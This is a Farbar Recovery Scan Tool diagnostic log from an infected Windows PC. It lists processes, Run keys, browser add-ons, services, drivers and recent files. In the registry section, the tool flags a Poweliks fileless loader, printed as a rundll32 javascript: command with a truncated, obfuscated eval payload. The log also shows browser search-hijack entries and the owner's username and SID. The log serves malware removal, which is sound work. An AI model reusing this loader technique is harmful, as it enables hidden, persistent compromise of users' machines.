(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngtool.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2host.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2printh.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngtool.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-10] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7830048 2009-10-13] (Realtek Semiconductor)
HKLM\...\Run: [Healthcare] => C:\Program Files\Lenovo\HealthCare\HealthCare.exe [827392 2009-09-28] (Lenovo)
HKLM\...\Run: [CLMLServer] => C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => C:\Program Files\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [IdeaNotesUser] => C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe [221872 2009-08-24] (Digital Delivery Networks, Inc.)
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [LTCM Client] => C:\Program Files\LTCM Client\ltcmClient.exe [1596096 2009-08-05] (Leader Technologies Inc.)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5223016 2014-10-23] (AVAST Software)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [EPSON Artisan 730 Series] => C:\windows\system32\spool\DRIVERS\W32X86\3\E_FATIHQA.EXE [212480 2011-01-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (AVAST Software)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x776496073BEDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @mcafee.com/SAFFPlugin -> C:\Program Files\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-07-30]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-10-23]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-25]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2013-06-25]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-10-23]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-10-23] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [3192344 2014-10-23] (Avast Software)
R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
R2 EpsonCustomerParticipation; C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe [521600 2011-06-09] (SEIKO EPSON CORPORATION)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-09-04] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\windows\system32\drivers\aswHwid.sys [24184 2014-10-23] ()
R2 aswMonFlt; C:\windows\system32\drivers\aswMonFlt.sys [70384 2014-10-23] (AVAST Software)
R1 aswRdr; C:\windows\system32\drivers\aswRdr2.sys [81768 2014-10-23] (AVAST Software)
R0 aswRvrt; C:\windows\system32\Drivers\aswRvrt.sys [49944 2014-10-23] ()
R1 aswSnx; C:\windows\system32\drivers\aswSnx.sys [787800 2014-10-23] (AVAST Software)
R1 aswSP; C:\windows\system32\drivers\aswSP.sys [422760 2014-10-23] (AVAST Software)
R2 aswStm; C:\windows\system32\drivers\aswStm.sys [91496 2014-10-23] (AVAST Software)
R0 aswVmm; C:\windows\system32\Drivers\aswVmm.sys [206248 2014-10-23] ()
R3 cfwids; C:\windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
R3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [15384 2014-01-07] ()
S3 EsgScanner; C:\windows\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [30976 2014-10-20] ()
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-24] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)
R2 monblanking; C:\windows\System32\DRIVERS\monblanking.sys [29280 2014-09-04] (Citrix Systems, Inc.)
R3 SuperIO; C:\windows\System32\DRIVERS\spio.sys [11720 2009-06-05] ()
R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [218192 2014-10-23] (Avast Software)
R2 WinI2C-DDC; C:\windows\system32\drivers\DDCDrv.sys [16200 2009-03-02] (Nicomsoft Ltd.)
S3 wsvd; C:\windows\System32\DRIVERS\wsvd.sys [81704 2009-07-21] (CyberLink)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-13] (Microsoft Corporation)
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-24 19:32 - 2014-10-24 19:34 - 00020605 _____ () C:\Users\Jude\Documents\FRST.txt
2014-10-24 19:30 - 2014-10-24 19:32 - 00000000 ____D () C:\FRST
2014-10-24 19:19 - 2014-10-24 18:57 - 01103360 _____ (Farbar) C:\Users\Jude\Documents\FRST.exe
2014-10-24 19:15 - 2014-10-24 19:15 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-24 19:14 - 2014-10-24 19:14 - 00000197 _____ () C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
2014-10-23 22:23 - 2014-10-23 22:23 - 00000247 _____ () C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
2014-10-23 22:15 - 2014-10-23 22:15 - 00002240 _____ () C:\Users\Jude\Desktop\SpyHunter.lnk
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\sh4ldr
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-10-23 22:14 - 2014-10-23 22:15 - 00000000 ____D () C:\windows\455F074C814E4520B69B5584BD90400C.TMP
2014-10-23 22:14 - 2014-10-23 22:14 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-10-23 22:11 - 2014-10-23 22:10 - 00728960 _____ (Enigma Software Group USA, LLC.) C:\Users\Jude\Documents\SpyHunter-Installer.exe
2014-10-23 21:07 - 2014-10-23 21:10 - 00021301 _____ () C:\Users\Jude\Desktop\dds.txt
2014-10-23 21:07 - 2014-10-23 21:10 - 00008670 _____ () C:\Users\Jude\Desktop\attach.txt
2014-10-23 21:06 - 2014-10-23 21:06 - 00000197 _____ () C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
2014-10-23 20:58 - 2014-10-23 21:00 - 00002498 _____ () C:\Users\Jude\Desktop\Rkill.txt
2014-10-23 20:57 - 2014-10-23 21:01 - 00000000 ____D () C:\AdwCleaner
2014-10-23 20:32 - 2014-10-23 20:32 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\AVAST Software
2014-10-23 20:30 - 2014-10-23 20:30 - 00000000 ____D () C:\windows\system32\vbox
2014-10-23 20:29 - 2014-10-23 20:29 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2014-10-23 20:28 - 2014-10-23 20:28 - 00787800 _____ (AVAST Software) C:\windows\system32\Drivers\aswSnx.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00422760 _____ (AVAST Software) C:\windows\system32\Drivers\aswSP.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00291352 _____ (AVAST Software) C:\windows\system32\aswBoot.exe
2014-10-23 20:28 - 2014-10-23 20:28 - 00206248 _____ () C:\windows\system32\Drivers\aswVmm.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00091496 _____ (AVAST Software) C:\windows\system32\Drivers\aswStm.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00081768 _____ (AVAST Software) C:\windows\system32\Drivers\aswRdr2.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00070384 _____ (AVAST Software) C:\windows\system32\Drivers\aswMonFlt.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00049944 _____ () C:\windows\system32\Drivers\aswRvrt.sys
2014-10-23 20:28 - 2014-10-23 20:28 - 00043152 _____ (AVAST Software) C:\windows\avastSS.scr
2014-10-23 20:28 - 2014-10-23 20:28 - 00024184 _____ () C:\windows\system32\Drivers\aswHwid.sys
2014-10-23 20:27 - 2014-10-23 20:27 - 00000000 ____D () C:\Program Files\AVAST Software
2014-10-23 20:25 - 2014-10-23 20:27 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-23 19:40 - 2014-10-23 19:41 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-23 12:36 - 2014-10-23 21:10 - 00000000 ____D () C:\Users\Jude\AppData\Local\CrashDumps
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\ProgramData\Sun
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-10-22 23:37 - 2014-10-22 23:37 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-22 23:35 - 2014-10-22 23:34 - 00272808 _____ (Oracle Corporation) C:\windows\system32\javaws.exe
2014-10-22 23:34 - 2014-10-22 23:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-22 23:34 - 2014-10-22 23:34 - 00175528 _____ (Oracle Corporation) C:\windows\system32\javaw.exe
2014-10-22 23:34 - 2014-10-22 23:34 - 00175528 _____ (Oracle Corporation) C:\windows\system32\java.exe
2014-10-22 23:34 - 2014-10-22 23:34 - 00096680 _____ (Oracle Corporation) C:\windows\system32\WindowsAccessBridge.dll
2014-10-22 23:34 - 2014-10-22 23:34 - 00000000 ____D () C:\Program Files\Java
2014-10-22 23:07 - 2014-10-22 23:08 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00001989 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00000000 ____D () C:\Program Files\Adobe
2014-10-20 21:34 - 2014-10-20 21:34 - 00000000 ____D () C:\Program Files\ESET
2014-10-20 21:07 - 2014-10-20 21:07 - 00030976 _____ () C:\windows\system32\Drivers\hitmanpro37.sys
2014-10-20 21:07 - 2014-10-20 21:07 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-20 20:22 - 2014-10-21 17:48 - 00034808 _____ () C:\windows\system32\Drivers\TrueSight.sys
2014-10-20 20:22 - 2014-10-20 20:22 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-20 20:13 - 2014-10-20 21:55 - 00000000 ____D () C:\windows\erdnt
2014-10-19 09:45 - 2014-10-24 19:26 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 09:35 - 2014-10-22 07:05 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 09:35 - 2014-10-22 07:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-22 07:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-19 09:34 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-16 06:01 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-16 06:01 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-16 06:00 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-16 06:00 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-16 06:00 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-16 06:00 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-16 06:00 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-16 06:00 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-16 06:00 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-16 06:00 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-16 06:00 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-16 06:00 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-16 06:00 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
